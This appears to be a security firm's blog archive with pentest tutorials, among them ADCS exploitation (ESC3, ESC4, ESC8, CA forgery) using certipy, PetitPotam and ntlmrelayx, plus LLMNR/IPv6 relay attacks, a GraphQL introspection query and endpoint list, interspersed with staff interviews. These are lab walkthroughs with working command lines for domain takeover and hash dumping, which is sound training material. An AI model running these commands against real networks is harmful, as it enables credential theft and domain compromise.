I recently updated the last installment in my AD series – Active Directory Certificate Services (ADCS) Misconfiguration Exploits – with a few new tricks I discovered recently on an engagement. I mentioned that I have seen web enrollment where it does not listen on port 80 (HTTP), which is the default for certipy. I ran into some weird issues with certipy when testing on port 443, and I found that NTLMRelayx.py worked better in that case. As promised, here is a short blog explaining what I did.
This is basically the same thing as using certipy – just a different set of commands. So here we will go through an example and see how it works.
The first part of the command points to the target. Make sure to include the endpoint (/certsrv/certfnsh.asp) as NTLMRelay won’t know that on its own. Also make sure to tell NTLMRelay if the host is HTTP or HTTPS.
The adcs flag tells NTLMRelay that we are attacking ADCS, and the template flag is used to specify the template. This is needed if you are relaying a domain controller or want to target a specific template. However, if you are planning on just relaying machines or users, you can actually leave this part out.
As connections come in, NTLMRelay will figure out on its own whether it’s a user or machine account and request the proper certificate. It does this based on whether the incoming username ends in a dollar sign. If it ends in a dollar sign NTLMRelay requests a machine certificate, if not it requests a user certificate.
Once NTLMRelay gets a successful relay, it will return a large Base64 blob of data. This is a Base64 encoded certificate.
You can take this Base64 blob and save it to a file. Then just decode the Base64 and save that as a PFX certificate file. After that the attack is the same as the certipy attack in my previous blog. Just use the certificate to login.
I’m Nathan Anderson, the newest lead penetration tester at Raxis. I’ve been on the team several months now, but Bonnie cut me some slack since I was booked solid. This might be a good time to remind folks that a pentest earlier in the year is often much easier to schedule no matter what company you trust with your cybersecurity testing!
Bonnie: So I hear you’ve been working with tech from a young age?
Nathan: True, I’ve been working with information technology systems for over nine years. It all started in high school when my dad brought home an old Dell tower server that a client decommissioned and an eight port Cisco router. Those hardware pieces became the platform of a young man’s experiments!
Bonnie: And you didn’t stop there. You continued into an IT degree in college as well?
Nathan: Exactly, I went from experimenting at home to college where I discovered Red Teaming and found my calling. I also ended up practicing coding and digital forensics. My forensics teacher at LCCC ended up losing a bet against a group of us regarding an off-hours project and bought us tickets to a Cleveland Browns game. Lots of fun memories there!
Bonnie: Now that sounds like a fun group! And by the time we met you, you had a number of certs under your belt too!
Nathan: After my experience in college I knew what I wanted to do, but I also knew that certificates hold more weight in the cybersecurity field… and I also realized that I needed some practice at pentesting. I started using HackTheBox and TryHackMe to practice while I got ready to take my OSCP.
Bonnie: With all of that time staring a computer, what do you do to relax?
Nathan: Well, in my spare time I end up focusing more on tech projects, which I really truly enjoy. Recently, I have been working on a Raspberry Pi 4 and Pico Pi Micro Controllers. There’s always some new tech I want to get my hands on!
Bonnie: That’s awesome! But please tell me you really do get to step away from the computers sometimes and just chill?
Nathan: In my spare time, I really enjoy kayaking, hiking, and fishing! I have been kayaking all over Ohio, from Lake Erie down to the Hocking River in southern Ohio. It has been something that is always relaxing for me. I have also been hiking all across the northeastern U.S. Last year, my wife and I drove to the White Mountains in New Hampshire to get away. It was awesome!
Bonnie: You’re joining a good crew then! When our marketing director, Jim retired, he hiked more than half of the Appalachian Trail, and Brian and Brad have been known to go on hiking adventures together. Last year while I was in Norway, Mark’s family talked me into kayaking… I was nervous, but I agree with you now! It’s so relaxing and beautiful!
Nathan: We have made our trips within driving distance from our home, however, for us “driving distance” has meant up to 12 hours of driving. We have driven to the Ozarks in Missouri, to the Smoky Mountains in Tennessee, to the Upper Peninsula in Michigan, and to the White Mountains in New Hampshire. It has lead to some great journeys! For our next trip, it isn’t going to be driving distance, I am shooting for Ireland. We will see what happens with that!
Bonnie: Those all sound amazing!
Nathan: One of our favorite non-outdoors things to do when traveling is finding the most interesting food we can. Recently we found the most interesting place when we were in Missouri at a place called “Top of the Rock.” One of the restaurants there served caribou stew and 90-day dry-aged steaks. I can tell you right now, I will absolutely be having both of those again.
Bonnie: Well, we’re really excited to have you on the Raxis team.
Nathan: I really enjoy the team here. I’m able to reach out to anyone with a question, and, if they don’t have the answer, they always direct me to the person who does. My favorite part of being a pentester is getting paid to break into things, and, at the same time, getting paid to basically have fun.
In the past few weeks lay-offs at several large pentesting companies have been in the news. At Raxis we understand the struggle to find and keep strong talent while balancing that with continuing sales to keep profitable, but it may be more than that.
With the recent announcement of layoffs that we’ve seen in cybersecurity firms, I can’t help but wonder if these bigger companies are missing the target due to their corporate nature and overly broad service offerings.
Raxis CEO, Mark Puckett
We’ve often been tempted to add on to Raxis’ offerings to meet customer’s needs or to join growing markets, but we always come back to a focus on pentesting. From red teams to security reviews, network pentests to application tests, our pentesters are experts in their field and enjoy their work. That’s what keeps them learning (don’t remind them that counts as work and not just fun!) and it’s also what allows us to provide our customers with the highest quality actionable results.
We’ve had many pentesters come to us stating that they no longer want to work for larger operations.
And we get that. I feel the same way, but it feels good to know that the team at Raxis agrees and feels that we’ve built a company where each of us is a key part of the team and feels appreciated. There are no small roles at Raxis, and each of us knows that.
Being small allows us to maintain our strong feeling of camaraderie, despite the limitations of being virtual. We make it a point to get to know each other, have ‘zoom happy-hours,’ and encourage chatting on things outside of work from time to time on Slack.
Being 100% virtual makes for a very short commute and a pleasant work environment, but that’s not what makes Raxis special. Our team is very supportive, not just for work but also because we respect each other and feel a strong connection. If one of us collects Spam containers (you know who you are), the rest of us send photos of odd Spam we find (in the most surprising places). From kid’s birthday parties to cracking a difficult password, our team is there for each other.
We are largely a group of whitehat hackers, making it much easier to attract top talent in our industry.
That’s honestly what makes it so fun to work at Raxis. We’re a group of folks who care about helping companies stay secure. Our job is a lot of fun, but, in the end, we feel good about what we do.
Interesting in joining the team? We’re looking for part-time contractor pentesters now. US citizens residing in the United States can apply on our Careers page.
Note: This blog was last updated 1/23/2024. Updates are noted by date below.
Active Directory Certificate Services (ADCS) is a server role that allows a corporation to build a public key infrastructure. This allows the organization to provide public key cryptography, digital certificates and digital signatures capabilities to the internal domain.
While using ADCS can provide a company with valuable capabilities on their network, a misconfigured ADCS server could allow an attacker to gain additional unauthorized access to the domain. This blog outlines exploitation techniques for vulnerable ADCS misconfigurations that we see in the field.
Tools We’ll Be Using
Certipy: A great tool for exploiting several ADCS misconfigurations.
PetitPotam: A tool that coerces Windows hosts to authenticate to other machines.
Secretsdump (a python script included in Impacket): A tool that dumps SAM and LSA secrets using methods such as pass-the-hash. It can also be used to dump the all the password hashes for the domain from the domain controller.
CrackMapExec: A multi-fasceted tool that, among other things, can dump user credentials while spraying credentials across the network to access more systems.
If an ADCS certificate authority has web enrollment enabled, an attacker can perform a relay attack against the Certificate Authority, possibly escalating privileges within the domain. We can use Certipy to find ADCS Certificate Authority servers by using the tool’s find command. Note that the attacker would need access to the domain, but the credentials of a simple authenticated user is all that is needed to perform the attack.
certipy find -dc-ip {DC IP Address} -u {User} -p {Password}
First, while setting up ADCS in my test environment, I setup a Certificate Authority to use for this testing.
Certipy’s find command also has a vulnerable flag that will only show misconfigurations within ADCS.
The text file output lists misconfigurations found by Certipy. While setting up my lab environment I checked the box for web enrollment. Here we see that the default configuration is vulnerable to the ESC8 attack:
To exploit this vulnerability, we can use Certipy to relay incoming connections to the CA server. Upon a successful relay we will gain access to a certificate for the relayed machine or the user account. But what really makes this a powerful attack is that we can relay the domain controller machine account, effectively giving us complete access to the domain. Using PetitPotam we can continue the attack and easily force the domain controller to authenticate to us.
The first step is to setup Certipy to relay the incoming connections to the vulnerable certificate authority. Since we are planning on relaying a domain controller’s connection, we need to specify the domain controller template.
certipy relay -ca {Certificate Authority IP Address} -template DomainController
Update 1/11/2024: While on an engagement I found that the organization had changed the default certificate templates. They had switched out the DomainController template with another one. So while I could successfully force a Domain Controller to authenticate, I would receive an error when trying to get a DomainController certificate. After a longer time than I care to admit, I used certipy to check the enabled templates and found that DomainController was not one of them. All I had to do was change the template name to match their custom template name. TL;DR: Check the templates if there is an error getting a DomainController certificate.
Now that Certipy is setup to relay connections, we use PetitPotam to coerce the domain controller into authenticating against our server.
python3 PetitPotam.py -u {Username} -p {Password} {Listener IP Address} {Target IP Address}
After Certipy receives the connection it will relay the connection and get a certificate for the domain controller machine account.
We can then use Certipy to authenticate with the certificate, which gives access to the domain controller’s machine account hash.
We can then use this hash with Secretsdump from the impacket library to dump all the user hashes. We can also use the hash with other tools such as CrackMapExec (CME) and smbclient. Basically anything that allows us to login with a username and hash would work. Here we use Secretsdump.
At this point we have complete access to the windows domain.
Update 1/23/2024: I have seen web enrollment where it does not listen on port 80 over HTTP, which is the default for certipy. I tried to use certipy on an engagement where web enrollment was listening only over HTTPS, and I ran into some weird issues. I found that NTLMRelay seems to work better in that situation, so I’ve written a new post detailing that attack.
Exploit 2: ESC3
In order to test additional misconfigurations that Certipy will identify and exploit, I started adding new certificate templates to the domain. While configuring the new template, I checked the option for Supply in the request, which popped up a warning box about possible issues.
Given that I want to exploit possible misconfigurations, I was happy to see it.
Note: If you are testing in your own environment, once you create the template you will need to configure the CA to actually serve it.
After creating and configuring the new certificate template, we use Certipy to enumerate vulnerable templates using the same command we used to start the previous attack. Certipy identified that the new template was vulnerable to ESC3 issue.
Exploiting this issue can allow an attacker to escalate privileges from those of a normal domain user to a domain administrator. The first step to gaining domain administrator privileges is to request a new certificate based on the vulnerable template. We will need access to the domain as a standard user.
certipy req -dc-ip {DC IP Address} -u {Username} -p {Password} -target-ip {CA IP Address} -ca {CA Server Name} -template {Vulnerable Template Name}
After acquiring the new certificate, we can use Certipy to request another certificate, this time a User certificate, for the administrator account.
certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA IP Address} -template User -on-behalf-of {Domain\Username} -pfx {Saved Certificate}
With the certificate for the administrator user, we use certipy to authenticate with the domain, giving us access to the administrator’s password hash.
certipy auth -pfx {Saved Administrator Certificate} -dc-ip {DC IP Address}
At this point we have access to the domain as the domain’s Administrator account. Using the tools we’ve previously learned about like CME, we can take complete control of the domain.
crackmapexec smb {Target IP Address} -u {Username} -H {Password Hash}
From this point, we can use the Secretsdump utility to gather user password hashes from the domain, as previously illustrated.
Exploit 3: ESC4
Another vulnerable misconfiguration that can occur is if users have too much control over the certificate templates. First we configure a certificate on my test network that gives users complete control over the templates.
Now we use Certipy to show the vulnerable templates using the same command as we used in the prior exploits.
We can use Certipy to modify the certificate to make it vulnerable to ESC1, which allows a user to supply an arbitrary Subject Alternative Name.
The first step is to modify the vulnerable template to make it vulnerable to another misconfiguration.
certipy template -u {Username} -p {Password} -template {Vulnerable Template Name} -save-old target-ip {CA Server IP Address}
Note that we can use the save-old flag to save the old configuration. This allows us to restore the template after the exploit.
After modifying the template, we can request a new certificate specifying that it is for the administrator account. When specifying the new account use the account@domain format.
certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA Server IP Address} -template {Template Name} -upn {Target Username@Domain} -dc-ip {DC IP Address}
Before we get too far, it’s a good idea to restore the certificate template.
After that we can authenticate with the certificate, again gaining access to the administrator’s hash.
certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
Exploit 4: Admin Control over CA Server
Another route to domain privilege escalation is if we have administrator access over the CA server. In the example lab I am just using a domain administrator account, but in a real engagement this access can be gained any number of ways.
If we have administrator access over the CA server, we can use the certificate to back everything up including the private keys and certificates.
certipy ca -backup -ca {CA Server Name} -u {Username} -p {Password} -dc-ip {DC IP Address}
After backing up the CA server up we can use Certipy to forge a new certificate for the administrator account. In a real engagement the domain information would have to be changed.
certipy forge -ca-pfx {Name of Backup Certificate} -upn {Username@Domain} -subject 'CN=Administrator,CN=Users,DC={Domain Name},DC={Domain Top Level}'
After forging the certificate, we can use it to authenticate, again giving us access to the user’s NTLM password hash.
certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
Now that we setup an AD test environment in my last post, we’re ready to try out broadcast attacks on our vulnerable test network.
In this post we will learn how to use tools freely available for use on Kali Linux to:
Discover password hashes on the network
Pivot to other machines on the network using discovered credentials and hashes
Relay connections to other machines to gain access
View internal file shares
For the attacker machine in my lab, I am using Kali Linux. This can be deployed as a virtual machine on the Proxmox server that we setup in my previous post or can be a separate machine as long as the Active Directory network is reachable.
MiTM6 will pretend to be a DNS server for a IPv6 network. By default Windows prefers IPv6 over IPv4 networks. Most places don’t utilize the IPv6 network space but don’t have it disabled in their Windows domains. Therefore, by advertising as a IPv6 router and setting the default DNS server to be the attacker, MiTM6 can spoof DNS entries allowing for man in the middle attacks. A note from their GitHub even mentions that it is designed to run with tools like ntlmrelayx and responder.
Responder will listen for broadcast name resolution requests and will respond to them on its own. It also has multiple servers that will listen for network connections and attempt to get user computers to authenticate with them, providing the attacker with their password hash. There is more to the tool than what is covered in this tutorial, so check it out!
CME is a useful tool for testing windows computers on the domain. There are many functions within CME that we won’t be discussing in this post, so I definitely recommend taking a deeper look! In this post we are using CME to enumerate SMB servers and whether SMB message signing is required and also to connect to and perform post exploitation activities.
First we will use CME to find all of the SMB servers on the AD network (10.80.0.0/24) and additionally to find those servers which do not require message signing. It saves those which don’t to the file name relay.lst.
Now we’re ready to start ntlmrelayx to relay credentials:
Ntlmrelayx is a tool that listens for incoming connections (mostly SMB and HTTP) and will, when one is received, relay (think forwarding) the connection/authentication to another SMB server. These other SMB servers are those that were found earlier by CME with the –gen-relay-list flag, so we know they don’t require message signing. Note that the smb2support flag just tells ntlmrelayx to setup a SMBv2 server.
Almost immediately we start getting traffic over HTTP:
Running the Attack
So far the responder, mitm6 and ntlmrelayx screens just show the initial starting of the program. Not much is actually happening in any of them. The CME screen is just showing the usage to gather SMB servers that don’t require message signing.
To help things along with our demo, we can force one of the computers on the network to attempt to access a share that doesn’t exist.
While a user looking for a share that doesn’t exist is not needed for this attack, it’s a quick way to skip waiting for an action to occur automatically. Many times on corporate networks, machines will mount shares automatically or users will need a share at some point allowing an attacker to poison the request them. If responder is the first to answer, our attack works, but, if not, the attack doesn’t work in that instance.
Responder captures and poisons the response so that the computer connects to ntlmrelayx, which is still running in the background.
Below we see where responder hears the search for “newshare” and responds with a fake/poisoned response saying that the attacker’s machine is in fact the host for “newshare.” This causes the victim machine to connect to ntlmrelayx which then relays the connection to another computer that doesn’t require message signing. We don’t need to see or crack a user password hash since we are just acting as a man in the middle (hence MiTM) and relaying the authentication from an actual user to another machine.
In this case the user on the Windows machine who searched for “newshare” turns out to be an administrator over some other machines, particularly the machine that ntlmrelayx relayed their credentials to. This means that ntlmrelayx now has administrator access to that machine.
The default action when ntlmrelayx has admin rights is to dump the SAM database. The SAM database holds the username and password hashes (NTLM) for local accounts to that computer. Due to how Windows authentication works, having the NTLM hash grants access as if we had the password. This means we can login to this computer at any time as the local administrator WITHOUT cracking the hash. While NTLM hashes are easy to crack, this speeds up our attack.
If other computers on the network share the same local accounts, we can then login to those computers as the admin as well. We could also use CME to spray the local admin password hash to check for credential reuse. Keep in mind that the rights and access we get to a server all depends on the rights of the user we are pretending to be. In pentests, we often do not start with an admin user and need to find ways to pivot from our initial user to other users with more access until we gain admin access.
The following screenshot shows ntlmrelayx dumping all of the local SAM password hashes on one device on our test network:
While getting the local account password hashes and and gaining access to new machines is a great attack, ntlmrelayx has more flags and modes that allow for other attacks and access. Let’s continue to explore these.
Playing around with –interactive
Ntlmrelayx has a mode that will create new TCP sockets that will allow for an attacker to interact with the created SMB connections after a successful relay. The flag is –interactive.
When the relay is successful a new TCP port is opened. We can connect to it with Netcat:
We can now interact with the host and the shares that are accessible to the user who is relayed.
nc 127.0.0.1 11000
nc 127.0.0.1 11001
Playing around with -SOCKS
With a successful relay ntlmrelayx can create a proxy that we can use with other tools to authenticate to other servers on the network. To use this proxy option ntlmrelayx has the -socks flag.
Here we use ntlmrelayx with the -socks flag to use the proxy option:
Below we see another user has an SMB connection relayed to an SMB server. With the proxy option ntlmrelayx sets up a proxy listener locally. When a new session is created (i.e. a user’s request is relayed successfully) it is added to the running sessions. Then, by directing other tools to the proxy server from ntlmrelayx, we can use these tools interact with these sessions.
In order to use this feature we need to set up our proxychains instance to use the proxy server setup by ntlmrelayx.
The following screen shows the proxychains configuration file at /etc/proxychains4.conf. Here we can see that, when we use the proxychains program, it is going to look for a socks4 proxy at localhost on port 1080. Proxychains is another powerful tool that can do much more than this. I recommend taking a deeper look.
Once we have proxychains set up, we can use any program that logs in over SMB. All we need is a user that has an active session. We can view active sessions that we can use to relay by issuing the socks command on ntlmrelayx:
In this example I have backup.admin session for each of the other 2 computers. Let’s use secretsdump from impacket’s library to gather hashes from the computer.
When the program asks for a password we can supply any text at all, as ntlmrelayx will handle the authentication for us and dump the hashes.
Since I am using a private test lab, the password for backup.admin is “Password2.” Here is an example of logging in with smbclient using the correct password:
Using proxychains to proxy the request through ntlmrelayx, we can submit the wrong password and still login successfully to see the same information:
Next Steps
All of the tools we discussed are very powerful, and this is just a sampling of what they can be used for. At Raxis we use these tools on most internal network tests. If you’re interested in a pentesting career, I highly recommend that you take a deeper look at them after performing the examples in this tutorial.
I hope you’ll join me next time when I discuss Active Directory Certificate Services and how to exploit them in our test AD environment.
Lead Pentester Andrew Trexler walks us through creating a simple AD environment.
Whether you use the environment to test new hacks before trying them on a pentest, or you use it while learning to pentest and study for the OSCP exam, it is a useful tool to have in your arsenal.
The Basics
Today we’ll go through the steps to set up a Windows Active Directory test environment using Proxmox to virtualize the computers. In the end, we’ll have a total of three connected systems, one Domain Controller and two other computers joined to the domain.
Setting up the Domain Controller (DC)
The first step is to setup a new virtualized network that will contain the Windows Active Directory environment. Select your virtualization server on the left:
This is a Windows based environment, but we’re using a Linux hypervisor to handle the underlying network architecture, so under System, select Network, and then create a Linux Bridge, as shown in Figures 2 and 3:
After setting up the network, we provision a new virtual machine where we will install Windows 2019 Server. Figure 4 shows the final configuration of the provisioned machine:
The next step is to install Windows 2019 Server. While installing the operating system make sure to install the Desktop Experience version of the operating system. This will make sure a GUI is installed, making it easier to configure the system.
Now that we have a fresh install, the next step is to configure the domain controller with a static IP address. This will allow the server to function as the DHCP server. Also make sure to set the same IP as the DNS server since the system will be configured later as the domain’s DNS server.
In order to make things easier to follow and understand later, let’s rename the computer to DC1 since it will be acting as our domain controller on the Active Directory domain.
Next, configure the system as a domain controller by using the Add Roles and Features Wizard to add the Active Directory Domain Services and DNS Server roles. This configuration will allow the server to fulfill the roles of a domain controller and DNS server.
After the roles are installed, we can configure the server and provision the new Active Directory environment. In this lab we will use the domain ad.lab. Other than creating a new forest and setting the name, the default options will be fine.
Setting Up the DHCP Service
The next step is to configure the DHCP service. Here we are using a portion of the 10.80.0.0/24 network space, leaving enough addresses available to accommodate static IP addressing where necessary.
There is no need for any exclusions on the network, and we will set the lease to be valid for an entire year.
Adding a Domain Administrator and Users
Additional configuration is now required within the domain. Let’s add a new domain administrator and some new domain users. Their names and passwords can be anything you want, just make sure to remember them.
First we create the Domain Administrator (DA):
Here we also make this user an Enterprise Admin (EA) by adding them to the Enterprise Admins group:
Next we will add a normal user to the domain:
Creating Windows PC
At this point we should have a functional Active Directory domain with active DHCP and DNS services. Next, we will setup and configure two other Windows 10 machines and join them to the domain.
The first step is to provision the resources on the Proxmox server. Since our test environment requires only moderate resources, we will only provision the machines with two processor cores and two gigabytes of RAM.
Then we install Windows 10 using the default settings. Once Windows is installed, we can open the Settings page and join the system to the ad.lab domain, changing the computer name to something easy to remember if called for.
Adding the system to the domain will require us to enter a domain admin’s password. After a reboot we should be able to login with a domain user’s account.
SMB Share
At this point, there should be three computers joined to the Active Directory domain. Using CrackMapExec, we can see the SMB server running on the domain controller but no other systems are visible via SMB. So let’s add a new network share. Open Explorer.exe, select Advance Sharing, and share the C drive.
I don’t recommend sharing the entire drive in an environment not used for testing, as it’s not secure: the entire contents of the machine would be visible. Since this is a pentest lab environment, though, this is exactly what we are looking for.
Creating the share resulted in the system exposing the SMB service to the network. In Figure 20 we verified this by using CrackMapExec to enumerate the two SMB servers:
Conclusion
At this point, our environment should be provisioned, and we are ready to test out different AD test cases, attacks, and other shenanigans. This environment is a great tool for ethically learning different exploits and refining pentesting techniques. Using a virtual infrastructure such as this also provides rollback capability for running multiple test cases with minimal downtime.
I hope you’ll come back to see my next posts in this series, which will show how to use this environment to test common exploits that we find during penetration testing.
GraphQL is a query language inspired by the structure and functionality of online data storage and collaboration platforms Meta, Instagram, and Google Sheets. This post will show you how to take advantage of one of its soft spots.
Development
Facebook developed GraphQL in 2012 and then it became open source in 2015. It’s designed to let application query data and functionality be stored in a database or API without having to know the internal structure or functionality. It makes use of the structural information exchanged between the source and the engine to perform query optimization, such as removing redundancy and including only the information that is relevant to the current operation.
To use GraphQL, since it is a query language (meaning you have to know how to code with it), many opt to use a platform to do the hard work. Companies like the New York Times, PayPal, and even Netflix have dipped into the GraphQL playing field by using Apollo.
Apollo
Apollo Server is an open-source, spec-compliant tool that’s compatible with any GraphQL client. It builds a production-ready, self-documenting GraphQL API that can use data from any source.
Apollo GraphQL has three primary tools and is well documented.
Client: A client-side library that helps you digest a GraphQL API along with caching the data that’s received.
Server: A library that connects your GraphQL Schema to a server. Its job is to communicate with the backend to send back responses based off the request of the client.
Engine: Tracks errors, gathers stats, and performs other monitoring tasks between the Apollo client and the Apollo server.
(We now understand that GraphQL is query language and Apollo is spec-compliant GraphQL server.)
A pentester’s perspective
What could be better than fresh, new, and developing technology? Apollo seems to be the king of the hill, but the issue here is the development of Apollo’s environment is dynamic and fast. Its popularity is growing along with GraphQL, and there seems to be no real competition on the horizon, so it’s not surprising to see more and more implementations. The most difficult part for developers is having proper access controls for each request and implementing a resolver that can integrate with the access controls. Another key point is the constant new build releases with new bugs.
Introspection
Batch attacks, SQLi, and debugging operations that disclose information are known vulnerabilities when implementing GraphQL. This post will focus on Introspection.
Introspection enables you to query a GraphQL server for information about the schema it uses. We are talking fields, queries, types, and so on. Introspection is mainly for discovery and as a diagnostic tool during the development phase. In a production system you usually don’t want just anyone knowing how to run queries against sensitive data. When they do, they can take advantage of this power. For example, the following field contains interesting information that can be queried by anyone on a GraphQL API in a production system with introspection enabled:
Let’s try it
One can obtain this level of information in a few ways. One way is to use Burp Suite and the GraphQL Raider plugin. This plugin allows you to isolate the query statement and experiment on the queries. For example, intercepting a post request for “/graphql”, you may see a query in the body, as shown below:
Using Burp Repeater with GraphQL we can change the query located in the body and execute an Introspection query for ‘name’ and see the response.
Knowing GraphQL is in use, we use Burp Extension GraphQL Raider to focus just on queries. Here we are requesting field names in this standard GraphQL request, but this can be changed to a number of combinations for more results once a baseline is confirmed.
This request is checking the ‘schema’ for all ‘types’ by ‘name’ . This is the response to that query on the right.
Looking further into the response received, we see a response “name”: “allUsers”. Essentially what is happening is we are asking the server to please provide information that has “name” in it. The response gave a large result, and we spot “allUsers”. If we queried that specific field, it would likely provide all the users.
The alternative would be to use CURL. You can perform the same actions simply by placing the information in a curl statement. So the same request as above translated over for Curl would be similar to:
You could opt to do this in the browser address bar as well, but that can be temperamental at times. So you can see how easy it is to start unraveling the treasure trove of information all without any authentication.
Even more concerning are the descriptive errors the system provides that can help a malicious attacker succeed. Here we use different curl statement to the server. This is the same request except that the query is for “system.”
When the request cannot be fulfilled, the server tries its best to recommend a legitimate field request. This allows the malicious attacker to formulate and build statements one error at a time if needed:
Pentest ToolBox
Ethical hackers would be wise to add this full request to their toolbox as it should provide a full request that provides a long list of objects, fields, mutations, descriptions, and more:
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
Ethical hackers, may want to add these to their directory brute force attacks as well:
/graphql
/graphiql
/graphql.php
/graphql/console
Conclusion
Having GraphQL introspection in production might expose sensitive information and expand the attack surface. Best practice recommends disabling introspection in production unless there is a specific use case. Even in this case, consider allowing introspection only for authorized requests, and use a defensive in-depth approach.
You can turn off introspection in production by setting the value of the introspection config key on your Apollo Server instance.
Although this post only addresses Introspection, GraphQL/Apollo is still known to be vulnerable to the attacks I mentioned at the beginning – batch attacks, SQLi, and debugging operations that disclose information – and we will address those in subsequent posts. However, the easiest and most common attack vector is Introspection. Fortunately, it comes with an equally simple remedy: Turn it off.
I’m Brice Jager, a lead penetration tester for Raxis — and the only one currently living in Iowa. My career path has taken me on a long journey from health care, to health care technology, and now to penetration testing. I’ve enjoyed all of it, but I now feel like I’m where I was meant to be.
Jim: Brice, in our discussions, it seems you’ve had two loves in your career: health and technology. I have to ask, which was the first to catch your eye, so to speak?
Brice: I guess I’d have to say technology because we were introduced to Apple computers in 3rd grade, and I was absolutely fascinated by them. I became serious about health at 12.
Jim: Yep, Steve Jobs believed in hooking his customers early. Was it just the interaction with technology, or did you actually realize you had an affinity for computers and how they worked?
Brice: Other kids were “interested.” I was obsessed with understanding them and learning what all they could do. If you had asked me back then, I would have probably said I was playing with the computers. In retrospect, I was really learning the fundamentals of programming. I even developed my own checkers game. At that point, we didn’t have widely available internet, so I had to learn from books — and a lot of trial and error.
Jim: Did your interest fade after that or did you continue to “play” with computers?
Brice: Ha! No, my interest only got more intense as I got older. By the ‘90s, I was into war-driving (riding around searching for vulnerable wireless networks) and basically looking for mischief wherever I could find it. Most people I knew were content with just using technology. I was still that kid who wanted the challenge of getting inside and finding out what made it all work.
Jim: You were a hacker even then.
Brice: I guess so. And remember, in those days, a lot of software and websites weren’t locked down as well as they are now. It was easier to see how everything was put together. I was able to give myself a terrific education.
Jim: So, what changed your focus to health care?
Brice: It didn’t change as much as it expanded. I always had a parallel interest in anatomy and physiology and overall health. In fact, it’s the same interest, only directed toward the body and not a computer. The fundamental questions I wanted to answer are the same as well: How does it work? What causes it not to work well? How can I make it work better?
Jim: Out of high school, you went with health care. What led you to that decision?
Brice: I found it easy because I had a pretty deep understanding of anatomy, and it was good to see people getting the results they always wanted. Over time, I became a neuromuscular specialist and helped people avoid surgery or avoid dependence on medications. In a nutshell, tricking the brain into healing itself.
Jim: You were hacking human brains?
Brice: Ha! Yeah, you hear that term a lot nowadays, but we were doing it literally and getting results. But there really wasn’t a career path beyond where I was without dancing on the line of burnout, and you quickly realize not all health care has the same goal in mind so it can become frustrating.
Jim: You did go into sports medicine, though.
Brice: Yes. In fact, I even became a kinesiology (body mechanics) teacher from 2004 until 2010. I enjoyed it and I still dabble in it some, but I was ready for a change. What I found was a job with a software company out of Finland. They needed someone who understood their product and who could teach it to others, and oddly it was still in the health-related arena. The jump to technology sparked interest and was refreshing.
Jim: Right up your alley on both counts.
“Spending time with my family is what I enjoy most. My wife is a professional photographer and we have a four-year-old son. We work and work out, but we manage to work in a lot of time for our family.” — Brice Jager
Brice: Yeah, and the great part is that it gave me a way to move into IT. I was dealing with the company team that built the software at the same time I was interacting with the customer. That helped me understand the struggles on both sides and led to my next job at the helpdesk of a hospital. Eventually, I became a systems administrator, but I was really a jack of all trades. I was doing everything from installing software to repairing IoT devices. What I didn’t do was a lot of cybersecurity.
Jim: There was a cybersecurity incident at that time, right?
Brice: That’s right. My first experience in the wild from the perspective of a victim as it happened. It took a lot of work to recover but it was accomplished in 48 hours.
Jim: That left an impression, I guess.
Brice: It sure did. I started pentesting on my own and really got excited about ethical hacking as a profession. Within a year, I had my CISSP, OSCP, OSWP, PNPT and KLCP (professional cybersecurity certifications).
Jim: Wow! I understand that each of those requires a lot of time and energy.
Brice: You bet, but it helps if you’re passionate about the field. It’s a LOT of sacrificing to accomplish the certifications between work, family, and life.
Jim: How did you find your way to Raxis?
Brice: Oddly enough, I was doing some research on another company that I was considering. I reached out to Bonnie and she and Mark talked with me at length. Based on how easy they were to speak with, I knew it would be a great place to work. You just know good people when you talk to them.
Jim: What’s your favorite part?
Brice: My favorite part of this job is that pentesting is my job! And pentesting is, by far, the favorite job I’ve had so far. I love working with the best in the business here. It’s easy to ask questions, and it’s easy to weigh in when you’ve got an answer.
Plus we get to break in to stuff . . . without getting in trouble.
Although social engineering attacks – including phishing, vishing, and smishing – are the most popular and reliable ways to gain unauthorized access to a network, some hackers simply don’t have the social or communications skills necessary to perform those attacks effectively. Wireless attacks, by contrast, are typically low-risk, high-reward opportunities that don’t often require direct interaction with the target.
That’s one reason why pentesting for wireless networks is one of Raxis’ most sought-after services. We have the expertise and tools to attack you in the same ways a real hacker will. In fact, I’ve successfully breached corporate networks from their parking lots, using inexpensive equipment, relatively simple techniques, and by attacking devices you might never suspect.
To appreciate how we test wireless networks, remember that wireless simply means sending radio signals from one device to another. The problem with that is that no matter how small the gap between them, there’s always room for a hacker to set up shop unless the network is properly secured.
So, if Raxis comes onsite to test your wireless network, the first thing we will likely do is map your network. This is a mostly passive activity in which we see how far away from your building the wireless signal travels normally. But we also have inexpensive directional antennas that allow us to access it from further away if we need to be stealthier.
Using an easily accessible aircrack-ng toolkit, we can monitor and capture traffic from wireless devices as well as send our own instructions to others that are unprotected. (I’ll go into more detail about that in a moment.)
As we establish the wireless network’s boundaries, we also determine whether there are guest networks or even open networks in use. Open networks, as the name implies, require no special permission to access. Even on controlled guest networks, we can usually get in with little effort if weak passwords are used or the same ones reused. Once we’re in as a guest, we’ll pivot to see if we can gain unauthorized access to other areas or other users’ data.
While this is going on, we will often set up a rogue access point, essentially just an unauthorized router that passes traffic to the internet. If the network is configured properly, it should detect this access point and prevent network traffic from accessing it. If not, however, we can capture the credentials of users who log into our device using a man-in-the-middle attack.
Our primary goal here is to capture usernames and password hashes, the characters that represent the password after it has been encrypted. In rare cases, we’re able to simply “pass the hash” and gain access by sending the encrypted data to the network server.
Most networks are configured to prevent this technique and force us to use a tool to try to crack the encryption. Such tools – again, readily available and inexpensive – can guess more than 300 billion combinations per second. So, if you’re using a short, simple password, we’ll have it in a heartbeat. Use one that’s more complex and it may take longer or we might never crack it.
